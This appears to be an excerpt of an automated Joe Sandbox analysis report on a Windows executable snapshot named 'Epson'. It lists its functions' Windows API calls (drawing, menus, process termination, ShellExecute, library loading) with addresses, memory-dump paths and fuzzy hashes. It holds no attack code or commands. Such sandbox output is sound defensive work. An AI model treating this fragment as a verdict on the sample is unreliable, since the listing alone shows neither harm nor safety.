                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00F51F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F51F87
                                                                                                                                                                                                                                        • Part of subcall function 00F51F2D: SelectObject.GDI32(?,00000000), ref: 00F51F96
                                                                                                                                                                                                                                        • Part of subcall function 00F51F2D: BeginPath.GDI32(?), ref: 00F51FAD
                                                                                                                                                                                                                                        • Part of subcall function 00F51F2D: SelectObject.GDI32(?,00000000), ref: 00F51FD6
                                                                                                                                                                                                                                      • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00FE94AA
                                                                                                                                                                                                                                      • LineTo.GDI32(?,00000003,00000000), ref: 00FE94BE
                                                                                                                                                                                                                                      • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00FE94CC
                                                                                                                                                                                                                                      • LineTo.GDI32(?,00000000,00000003), ref: 00FE94DC
                                                                                                                                                                                                                                      • EndPath.GDI32(?), ref: 00FE94EC
                                                                                                                                                                                                                                      • StrokePath.GDI32(?), ref: 00FE94FC
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 43455801-0
                                                                                                                                                                                                                                      • Opcode ID: 4c21a4dbf92b6ae328900dfb051dfd5df9dc6db6d639a3f88cf0471d02c06ae8
                                                                                                                                                                                                                                      • Instruction ID: 78e422698448b760fd8ec900762db7659cca5ce775c96e7f4e64411be6a6fdfe
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4c21a4dbf92b6ae328900dfb051dfd5df9dc6db6d639a3f88cf0471d02c06ae8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5911CC7600014DBFDF129F90DC89E9A7F6DEB08364F048015FE1959165C772AD55EBA0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00FB5B7C
                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00FB5B8D
                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FB5B94
                                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00FB5B9C
                                                                                                                                                                                                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00FB5BB3
                                                                                                                                                                                                                                      • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00FB5BC5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CapsDevice$Release
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1035833867-0
                                                                                                                                                                                                                                      • Opcode ID: 9fe675ba59a69cefc0a2004e94ddbf832e31fd940927851ab9196e7f4af2e7a8
                                                                                                                                                                                                                                      • Instruction ID: 4d9fb439bcf83ae2ec8706029417a8c8de23ab3899861cc389fdf58a40a6cda9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9fe675ba59a69cefc0a2004e94ddbf832e31fd940927851ab9196e7f4af2e7a8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 83014475E00758BBEB109BA69C49F4E7F78EB44751F044065FA05AB680D6749D00DF90
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F532AF
                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00F532B7
                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F532C2
                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F532CD
                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00F532D5
                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F532DD
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Virtual
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4278518827-0
                                                                                                                                                                                                                                      • Opcode ID: 67646e1f44ce901e09eebc4c644008795658e01607d91638f5b16432ab54a622
                                                                                                                                                                                                                                      • Instruction ID: 444e8c9bf28811d52e8646dead4a872c40bb2552064719f090fc4d28119fe1d3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 67646e1f44ce901e09eebc4c644008795658e01607d91638f5b16432ab54a622
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E10167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00FBF447
                                                                                                                                                                                                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00FBF45D
                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00FBF46C
                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FBF47B
                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FBF485
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FBF48C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 839392675-0
                                                                                                                                                                                                                                      • Opcode ID: 24708fa61fb7e377afb2c20605f2910d195607d8d7c44b3dd963a6fb6d6e97e9
                                                                                                                                                                                                                                      • Instruction ID: a643a580c2f836a0522ee229d138209b3f4fd208194e5c36aedac7211e12dc65
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 24708fa61fb7e377afb2c20605f2910d195607d8d7c44b3dd963a6fb6d6e97e9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 54F03A3224119CBFE7215B62DC4EEEF3B7CEFC6B11F000058FA1199490D7A46A01EAB5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetClientRect.USER32(?), ref: 00F934EF
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 00F93506
                                                                                                                                                                                                                                      • GetWindowDC.USER32(?), ref: 00F93512
                                                                                                                                                                                                                                      • GetPixel.GDI32(00000000,?,?), ref: 00F93521
                                                                                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00F93533
                                                                                                                                                                                                                                      • GetSysColor.USER32(00000005), ref: 00F9354D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 272304278-0
                                                                                                                                                                                                                                      • Opcode ID: c81821db59cdfe979e534cf7547d651680c96ae906a9a40a234a9185373e0cd7
                                                                                                                                                                                                                                      • Instruction ID: d456d1356d8fd08796c80de69cf626ee04293dbf55a6f094cac7f39d89acfc93
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c81821db59cdfe979e534cf7547d651680c96ae906a9a40a234a9185373e0cd7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E014B31500259EFEB505FA4DC48BEA7BB5FB48321F550161FA1AAA5A0CB321E51BF10
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00FB21CC
                                                                                                                                                                                                                                      • UnloadUserProfile.USERENV(?,?), ref: 00FB21D8
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00FB21E1
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00FB21E9
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00FB21F2
                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00FB21F9
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 146765662-0
                                                                                                                                                                                                                                      • Opcode ID: 274aeddf71d8244ff0f1a2c6b350d30d5d14bf902f26bd51357af48739be8d68
                                                                                                                                                                                                                                      • Instruction ID: 220cd1c09908b5a8cd10388a2ec41b30ff9c7bbee159f871ad07bc02041beda9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 274aeddf71d8244ff0f1a2c6b350d30d5d14bf902f26bd51357af48739be8d68
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CEE01A76004149FFEB015FA1EC4CD0ABF39FF49322B104220F2358A870CB329420EB50
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00F541EA: _wcslen.LIBCMT ref: 00F541EF
                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00FBCF99
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FBCFE0
                                                                                                                                                                                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00FBD047
                                                                                                                                                                                                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00FBD075
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                      • API String ID: 1227352736-4108050209
                                                                                                                                                                                                                                      • Opcode ID: d93899b1195487f73b2f4feef644eafde5392ac9c79774b00ae3235d29460b0b
                                                                                                                                                                                                                                      • Instruction ID: 7a9f5f3fbd4556663be5e034c80bdbc6fbecbf7256861f89c3fece6097d5c320
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d93899b1195487f73b2f4feef644eafde5392ac9c79774b00ae3235d29460b0b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8351F332A043019BD714AE26CC45BABB7E8AF453A4F040A2DF995D7190EB74C945EB93
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ShellExecuteExW.SHELL32(0000003C), ref: 00FDB903
                                                                                                                                                                                                                                        • Part of subcall function 00F541EA: _wcslen.LIBCMT ref: 00F541EF
                                                                                                                                                                                                                                      • GetProcessId.KERNEL32(00000000), ref: 00FDB998
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00FDB9C7
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                                                                                                                      • String ID: <$@
                                                                                                                                                                                                                                      • API String ID: 146682121-1426351568
                                                                                                                                                                                                                                      • Opcode ID: d6e5ede2b72270a12a1c93220f12ea0cdfaa3ecac5d5897c2d33183b81d37905
                                                                                                                                                                                                                                      • Instruction ID: 1f525caf82726b8878a9569dbcea8caa8c60b84807638ed103840f71335bc31e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d6e5ede2b72270a12a1c93220f12ea0cdfaa3ecac5d5897c2d33183b81d37905
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5471AA30A00219DFCB10EF94C895A9DBBF1FF08310F09849AE916AB351CB78ED45EB91
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00FB7B6D
                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00FB7BA3
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00FB7BB4
                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00FB7C36
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                                                                                                      • String ID: DllGetClassObject
                                                                                                                                                                                                                                      • API String ID: 753597075-1075368562
                                                                                                                                                                                                                                      • Opcode ID: bff88ca49b6f98ee356fd0d8314a278566bfc6937ec63c1236f9fdf71b50de28
                                                                                                                                                                                                                                      • Instruction ID: 73a44fa71011da1b1cb035d6d6b8a0dbff522a19ce2a07d5b9744d7ee74b52ec
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bff88ca49b6f98ee356fd0d8314a278566bfc6937ec63c1236f9fdf71b50de28
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F419EB1604308EFDB15EF26C884A9A7BB9EF84314B1080ADA9059F246D7B4DD40EFA0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FE48D1
                                                                                                                                                                                                                                      • IsMenu.USER32(?), ref: 00FE48E6
                                                                                                                                                                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00FE492E
                                                                                                                                                                                                                                      • DrawMenuBar.USER32 ref: 00FE4941
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                      • API String ID: 3076010158-4108050209
                                                                                                                                                                                                                                      • Opcode ID: 05e8e887f9259f4a28c7d80d339e3ec696c5fb1898e8d713e8b224c6050056bb
                                                                                                                                                                                                                                      • Instruction ID: 5074538c4026c317ae1287ba6258edeb31b29304ba0ddc0476c2b6c5b3081ba1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 05e8e887f9259f4a28c7d80d339e3ec696c5fb1898e8d713e8b224c6050056bb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8F415775A01289EFDB20CF52D8C4AAEBBB9FF06324F04412DE955AB251C334AD54EF60
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00F5B329: _wcslen.LIBCMT ref: 00F5B333
                                                                                                                                                                                                                                        • Part of subcall function 00FB45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00FB4620
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00FB27B3
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00FB27C6
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00FB27F6
                                                                                                                                                                                                                                        • Part of subcall function 00F58577: _wcslen.LIBCMT ref: 00F5858A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$_wcslen$ClassName
                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                      • API String ID: 2081771294-1403004172
                                                                                                                                                                                                                                      • Opcode ID: 2301c40713140494a324a90901876d60145d5f0ec9e62c0fbf28ff1ff09367aa
                                                                                                                                                                                                                                      • Instruction ID: 9cba789cee82931e09a6e2e502189419d006cddde152500092bb6657f4bb66d7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2301c40713140494a324a90901876d60145d5f0ec9e62c0fbf28ff1ff09367aa
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF210771900104BEDB05AB65DC86DFEB778DF453A0F14412AF811A71E1DF79890AFA50
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00FE3A29
                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(?), ref: 00FE3A30
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00FE3A45
                                                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 00FE3A4D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                                                                                                      • String ID: SysAnimate32
                                                                                                                                                                                                                                      • API String ID: 3529120543-1011021900
                                                                                                                                                                                                                                      • Opcode ID: 71f12670daf5e87de1065720a8ab4eeec921e4611a6e4265a3c75d41bf28f741
                                                                                                                                                                                                                                      • Instruction ID: ca8a37a5ed254c5124a4d117063903edd57d4b19c3a7ee4ca057d55e237b6e61
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 71f12670daf5e87de1065720a8ab4eeec921e4611a6e4265a3c75d41bf28f741
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E21CD75A00289BBEB109F66DC8CFAB37AAEB45764F105228FA91970D1C375CD80A760
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00F7508E,?,?,00F7502E,?,010198D8,0000000C,00F75185,?,00000002), ref: 00F750FD
